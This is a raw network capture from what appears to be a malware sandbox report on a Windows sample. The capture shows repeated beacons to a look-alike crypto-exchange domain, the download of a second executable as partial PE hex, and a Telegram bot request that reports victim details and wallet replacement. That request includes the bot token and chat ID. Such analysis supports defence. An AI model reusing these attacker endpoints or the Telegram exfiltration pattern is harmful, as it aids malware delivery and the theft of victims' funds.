Jul 6, 2024 13:29:17.007226944 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BIm5FdBPuKadRGX8CxCy5FV6Hpviu7czbn%2BtGJqbkgEraKpeZyZDPd3DdR0%2FCbYYPIhdzfgi13b1EpKZzb4MfqYa%2FpjOFjmPFpYK4HCKk3hi%2F46yYlhd0NpBDQSY1x9Du5lMwiw27rH8lZM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef418f6ec87c99-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49950	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:17.117980957 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:17.122773886 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:18.337018013 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fNeCfTS7ilAH0YH1ymrrzaXKert98XLzQ8XcQLH4Nwap9Zjcj1Q7RCCpm7PLlYP8%2B3LXm34zK%2B8kb0UsjexXTztiICsFu9S%2Bgmns1rub8XSTpXhyxaEepTodHpA7BNABeYynHGCQhKBF1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef419499b38ca5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49951	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:18.447887897 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:18.453773975 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:19.411593914 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQhRUnbirjbAz3rMy55TJy%2BFXNpqNHvOVPJDmodAi3TKumUmtfKrHgkmXyVhDz6Lor01Y1bPTxIau56A1iwXZ5Jwa8rQtL3i3uuGCE1aShQwZp%2B8Qfam3JhWBnD1xzMdl2rTjT3Ypgd5Zpc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef419ceb6b7c87-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49953	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:19.523977041 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:19.529475927 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:20.203171015 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PLxpPmPFZ9QHWUU0S%2FHMKbZqcRcyj0tMWb272STv%2Bk37R39z2C05PhbTBNVcc0sX6QwMqOYS4bV0ReNoK77%2F6VI3hJXNwnuOl7DD%2Fw2esElB43AEn6r0IL8MnYVRfpPKLRJFD%2FFRIu2SPak%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41a3bd968c96-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49954	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:20.361651897 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:20.366750956 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:21.131361008 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtKBo%2BbCEYO%2BKaAEir1icxSLMtPp2B1xHFDTZAUQIL%2FWS7%2FJAgrne7vVbYeVEa6YkMeTSiZ5ntEQERDm5aCYpFV3hAmhIctYd%2BHR6hemeOzr3sh0riTcjPbOneiGGdSplTMMehr8Ko3Y324%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41a8e90f728f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49955	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:21.262339115 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:21.267172098 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:22.045747995 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9dJSZt3N%2FKAlvhB8IlChxQotNtBNg%2FgDt6KlTH07dg2evb6w0chCoWCzNy930s1ZtuXUZ%2FeiC%2FVNdnKt0LW8B%2FY1MgNgsEeB6HxP1f0rwVLgKJrkp04X0WIH3geNfCQh8kwbHUoKrLX1fw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41ae7cfd18b4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49956	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:22.166191101 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:22.174037933 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:23.021195889 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkq6A4Lfu0w3mFAn1pv3wd1bf%2FVADDzhUB9xxPWzLywWIQ8jVUNC4tShVkXvmUxuPgwXzBgzVVtoXgBNW3QjGhDJB0JCByMF56uoGO64W403OK%2FMB7VoTygrRRpoI%2BTZobaTk77mN5onU8E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41b40f6ac40c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49957	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:23.136375904 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:23.142632008 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:23.867224932 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Czv3XsoSWY7coRG8VU4faArHOUxnCS2olWsTgbTdJ9xT%2FVvv4AUx7w8bcAmuq%2F1fHThTcrVSfjEG0GNP1zMCIXJUM7Z4LfWfA6nZUmTswDlHxk9ZvvChzXl92FP0BMHx9mmxvhLlkxk3voU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41ba3f860f37-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49959	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:23.978282928 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:23.983269930 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:24.789191008 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OtkwfGd7QsDjw2JY%2B8G8pUyxCBhelTjG9LOsENi1V%2BG2OFdwVembCM7fSPGPNNZ0Vkq07AkX8iGHEdw7iid2iDB2wxvO2ER%2BtUpFRiqurJXCbGL%2B3dbwL7lluepwPzli4jxOIQmnLjm5d4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41bf68e44262-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	6784	C:\Users\user\Desktop\xj40xovMsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:26:57 UTC	109	OUT	GET /event.php HTTP/1.1 User-Agent: Mozilla 5/0 Host: auth.xn--conbase-sfb.xyz Cache-Control: no-cache
2024-07-06 11:26:58 UTC	661	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:26:58 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 Content-Disposition: inline; filename="zbi.exe" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BoOdB3dbf5t7gKRbq9mXlDnKFnnfHioAENAIWqhxAmHXXGMihQjcTUK6mj7low6YQ4%2FuEIbdLjtG5lOA1WN5rA57C%2BggpVEyIathfyLrSkK5YuZoTwPsXD6XhgWkmIfCDpLxena%2FH1a2fsI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e2bce6042d1-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:26:58 UTC	708	IN	Data Raw: 33 35 39 32 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e c7 3a c2 da a6 54 91 da a6 54 91 da a6 54 91 da a6 55 91 16 a6 54 91 26 d1 ed 91 cf a6 54 91 26 d1 e8 91 d8 a6 54 91 44 06 93 91 db a6 54 91 1e 63 9b 91 91 a6 54 91 1e 63 9a 91 0b a6 54 91 1e 63 99 91 d1 a6 54 91 fd 60 87 91 d7 a6 54 91 fd 60 9d 91 db a6 54 91 da a6 c3 91 db a6 54 91 fd 60 98 91 db a6 54 91 52 69 63 68 da a6 54 91 00 00 00 00 00 00 00 00 00 Data Ascii: 3592MZ@!L!This program cannot be run in DOS mode.$:TTTUT&T&TDTcTcTcT`T`TT`TRichT
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1b 00 00 00 d0 03 00 00 1c 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.reloc@B
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 8b 5c 24 30 f3 0f 7f 47 18 48 83 c4 20 5f c3 cc cc 40 53 48 81 ec d0 07 00 00 48 8b 05 d8 3f 03 00 48 33 c4 48 89 84 24 c0 07 00 00 48 8b d9 84 d2 74 46 48 8d 4c 24 20 33 d2 41 b8 cc 02 00 00 e8 d4 45 01 00 48 8b 4b 08 48 8d 54 24 20 c7 44 24 20 02 00 10 00 ff 15 2d 4d 02 00 85 c0 75 10 48 8d 0d c2 a6 02 00 e8 21 af 00 00 33 c0 eb 48 8b 84 24 c4 00 00 00 eb 3f 48 8d 8c 24 f0 02 00 00 33 d2 41 b8 d0 04 00 00 e8 8b 45 01 00 48 8b 4b 08 48 8d 94 24 f0 02 00 00 c7 84 24 20 03 00 00 02 00 10 00 ff 15 be 4c 02 00 f7 d8 48 1b c0 48 23 84 24 78 03 00 00 48 8b 8c 24 c0 07 00 00 48 33 cc e8 41 a6 00 00 48 81 c4 d0 07 00 00 5b c3 40 55 53 56 57 48 8d ac 24 08 f9 ff ff 48 81 ec f8 07 00 00 48 8b 05 0d 3f 03 00 48 33 c4 48 89 85 e0 06 00 00 41 8a f9 49 8b d8 4c 8b da Data Ascii: \$0GH _@SHH?H3H$HtFHL$ 3AEHKHT$ D$ -MuH!3H$?H$3AEHKH$$ LHH#$xH$H3AH[@USVWH$HH?H3HAIL
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 48 8b 11 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 06 48 8b 01 ff 50 10 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b 7a 10 49 8b e8 48 8b f2 48 8b d9 49 3b f8 0f 82 d2 00 00 00 49 2b f8 4c 3b cf 49 0f 42 f9 48 3b ca 75 2c 4a 8d 04 07 48 39 41 10 0f 82 c2 00 00 00 48 83 79 18 10 48 89 41 10 72 03 48 8b 09 c6 04 08 00 33 d2 48 8b cb e8 c1 00 00 00 eb 7f 48 83 ff fe 0f 87 a7 00 00 00 48 39 79 18 73 0e 4c 8b 41 10 48 8b d7 e8 3f 01 00 00 eb 1b 48 85 ff 75 1b 48 21 79 10 48 83 79 18 10 72 05 48 8b 01 eb 03 48 8b c1 c6 00 00 48 85 ff 74 41 48 83 7e 18 10 72 03 48 8b 36 48 83 7b 18 10 72 05 48 8b 0b eb 03 48 8b cb 48 85 ff 74 0c 48 8d 14 2e 4c 8b c7 e8 e3 a2 00 00 48 83 7b 18 10 48 89 7b 10 72 05 48 8b 03 eb 03 48 8b Data Ascii: HHHcHHLHHtHPH(H\$Hl$Ht$WH HzIHHI;I+L;IBH;u,JH9AHyHArH3HHH9ysLAH?HuH!yHyrHHHtAH~rH6H{rHHHtH.LH{H{rHH
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 89 5b 18 49 89 73 20 48 8b 05 39 35 03 00 48 33 c4 48 89 44 24 40 48 8b da 48 8b f1 49 89 4b d8 49 89 53 e0 83 64 24 20 00 48 c7 41 18 0f 00 00 00 48 83 61 10 00 c6 01 00 45 33 c0 48 8d 15 ec 9c 02 00 e8 f7 f8 ff ff c7 44 24 20 01 00 00 00 33 ff 48 39 7b 10 76 6c 48 8b 43 18 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 41 7c 2c 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 5a 7f 18 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 41 80 c0 20 eb 12 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 ba 01 00 00 00 48 8b ce e8 8c 06 00 00 48 ff c7 48 3b 7b 10 72 94 48 83 7b 18 10 72 08 48 8b 0b e8 e8 a4 00 00 48 c7 43 18 0f 00 00 00 48 83 63 10 00 c6 03 00 48 8b c6 48 8b 4c 24 40 48 33 cc e8 64 9b 00 00 48 8b 5c 24 70 48 8b 74 24 78 48 83 Data Ascii: [Is H95H3HD$@HHIKISd$ HAHaE3HD$ 3H9{vlHCHrHH<9A\|,HrHH<9ZHrHHD8A HrHHD8HHH;{rH{rHHCHcHHL$@H3dH\$pHt$xH
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 48 83 79 18 08 48 8b d9 72 08 48 8b 09 e8 3c a0 00 00 33 c0 48 c7 43 18 07 00 00 00 48 89 43 10 66 89 03 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 13 e8 0e a0 00 00 48 83 23 00 48 83 63 08 00 48 83 63 10 00 48 83 c4 20 5b c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b d9 48 8b 49 08 48 8b fa 48 3b d1 0f 83 b4 00 00 00 48 39 13 0f 87 ab 00 00 00 48 2b 3b 48 b8 1b ca 6b 28 af a1 bc 06 48 f7 ef 48 8b fa 48 c1 ff 03 48 8b c7 48 c1 e8 3f 48 03 f8 48 3b 4b 10 75 08 48 8b cb e8 82 02 00 00 48 8b 4b 08 48 69 ff 30 01 00 00 be 30 01 00 00 48 03 3b 48 85 c9 0f 84 f9 00 00 00 48 8b c7 48 0b c1 83 e0 0f 0f 85 df 00 00 00 8d 50 02 8d 42 7e 0f 28 07 0f 29 01 0f 28 4f 10 Data Ascii: H\$0H _@SH HyHrH<3HCHCfH [@SH HHHtH#HcHcH [H\$Ht$WH HHIHH;H9H+;Hk(HHHHH?HH;KuHHKHi00H;HHHPB~()(O
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: ff c8 75 af 0f 28 02 0f 29 01 0f 28 4a 10 0f 29 49 10 0f 28 42 20 0f 29 41 20 eb 08 4c 8b c5 e8 a1 93 00 00 48 03 fd 48 03 dd 48 3b fe 0f 85 61 ff ff ff 48 8b 6c 24 38 48 8b 74 24 40 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 89 5c 24 08 57 48 81 ec 70 06 00 00 48 8b 05 34 2a 03 00 48 33 c4 48 89 84 24 60 06 00 00 48 8d 94 24 50 04 00 00 41 b8 04 01 00 00 33 c9 ff 15 13 38 02 00 33 ff 85 c0 75 07 32 c0 e9 a2 00 00 00 45 33 c9 48 8d 84 24 40 02 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 d7 39 02 00 85 c0 78 d6 45 33 c9 48 8d 44 24 30 45 33 c0 41 8d 51 1a 33 c9 48 89 44 24 20 ff 15 b7 39 02 00 85 c0 78 b6 48 83 cb ff 48 8d 84 24 40 02 00 00 4c 8b c3 49 ff c0 66 42 39 3c 40 75 f6 48 8d 94 24 40 02 00 00 48 8d 8c 24 50 04 00 00 e8 c9 9c 00 Data Ascii: u()(J)I(B )A LHHH;aHl$8Ht$@HH\$0H _H\$WHpH4*H3H$`H$PA383u2E3H$@E3AQ3HD$ 9xE3HD$0E3AQ3HD$ 9xHH$@LIfB9<@uH$@H$P
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 16 35 02 00 85 c0 78 18 4c 8d 85 60 03 00 00 48 8d 54 24 40 48 8d 8d 50 01 00 00 e8 22 fc ff ff 48 8d 8d 50 01 00 00 e8 5e fd ff ff 48 8d 4c 24 40 e8 54 98 00 00 48 8b 8d 70 05 00 00 48 33 cc e8 f5 8b 00 00 48 81 c4 80 06 00 00 5d c3 44 8b c1 48 63 4a 3c 48 03 ca 44 0f b7 49 14 4c 03 c9 45 3b 41 2c 73 04 41 8b c0 c3 44 0f b7 51 06 33 d2 45 85 d2 7e 29 0f b7 c2 48 8d 0c 80 45 8b 5c c9 24 45 3b c3 72 0d 41 8b 4c c9 28 41 03 cb 44 3b c1 72 0e 66 ff c2 0f b7 c2 41 3b c2 7c d7 33 c0 c3 0f b7 c2 48 8d 0c 80 41 8b 44 c9 2c 41 2b 44 c9 24 41 03 c0 c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 63 41 3c 48 8b d9 b9 0b 01 00 00 66 39 4c 18 18 74 77 b9 0b 02 00 00 66 39 Data Ascii: E3AQ3HD$ 5xL`HT$@HP"HP^HL$@THpH3H]DHcJ<HDILE;A,sADQ3E~)HE\$E;rAL(AD;rfA;\|3HAD,A+D$AHHXHhHpHx AVH HcA<Hf9Ltwf9
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: 01 00 00 48 8b 7c 24 58 48 83 7d b8 08 72 09 48 8b 4d a0 e8 3f 90 00 00 48 c7 45 b8 07 00 00 00 4c 89 75 b0 66 44 89 75 a0 48 8d 47 ff 48 83 f8 fd 0f 87 e7 00 00 00 4c 89 75 d8 33 c0 48 89 45 e0 48 8d 15 13 8a 02 00 48 8d 0d 2c 8a 02 00 e8 4f da 00 00 85 c0 75 29 c6 45 98 01 c7 44 24 20 0d 00 00 00 44 8d 48 01 4c 8d 45 98 48 8d 55 d8 48 8b cf ff 15 fa 2f 02 00 85 c0 0f 88 9d 00 00 00 4c 89 75 d0 4c 89 74 24 40 48 8d 45 d0 48 89 44 24 38 89 74 24 30 48 89 5c 24 28 48 8d 45 d8 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 48 8b cf ff 15 a5 2f 02 00 85 c0 79 08 ff 15 2b 2d 02 00 eb 5c 48 8d 15 a2 89 02 00 48 8d 0d ab 89 02 00 e8 ce d9 00 00 85 c0 75 40 45 33 c0 33 d2 8d 48 40 ff 15 b4 2c 02 00 48 8b d8 ff 15 8b 2c 02 00 48 8b c8 c7 44 24 30 02 00 00 00 44 89 74 24 Data Ascii: H\|$XH}rHM?HELufDuHGHLu3HEHH,Ou)ED$ DHLEHUH/LuLt$@HEHD$8t$0H\$(HEHD$ E3E33H/y+-\HHu@E33H@,H,HD$0Dt$
2024-07-06 11:26:58 UTC	1369	IN	Data Raw: a6 20 01 00 48 8d 54 24 50 48 8d 0d ba b3 02 00 44 8b c3 ff 15 a9 29 02 00 45 33 c9 48 89 7c 24 30 48 8d 8c 24 60 02 00 00 45 8d 41 01 ba 00 00 00 80 c7 44 24 28 80 00 00 00 c7 44 24 20 03 00 00 00 ff 15 a2 28 02 00 48 8d 54 24 40 48 8b c8 48 89 7c 24 40 48 8b d8 e8 a9 7e 00 00 48 8b f0 48 85 c0 74 4d 48 8b cb ff 15 04 28 02 00 8b 54 24 40 48 8b ce e8 a8 f8 ff ff 48 8b c8 e8 6c fb ff ff 48 8d 4c 24 50 48 8b d6 4c 8b c8 e8 fc fb ff ff 48 8b 54 24 40 41 b8 00 40 00 00 48 8b ce 8a d8 ff 15 02 29 02 00 84 db 40 0f 95 c7 8b c7 eb 03 83 c8 ff 48 8b 8c 24 70 04 00 00 48 33 cc e8 d5 80 00 00 4c 8d 9c 24 80 04 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 40 53 48 83 ec 20 45 33 c0 48 c7 41 18 07 00 00 00 48 8b d9 4c 89 41 10 66 44 89 01 66 44 39 02 74 11 48 83 c8 Data Ascii: HT$PHD)E3H\|$0H$`EAD$(D$ (HT$@HH\|$@H~HHtMH(T$@HHlHL$PHLHT$@A@H)@H$pH3L$I[IsI_@SH E3HAHLAfDfD9tH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49751	149.154.167.220	443	6828	C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:20 UTC	1306	OUT	GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1% [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
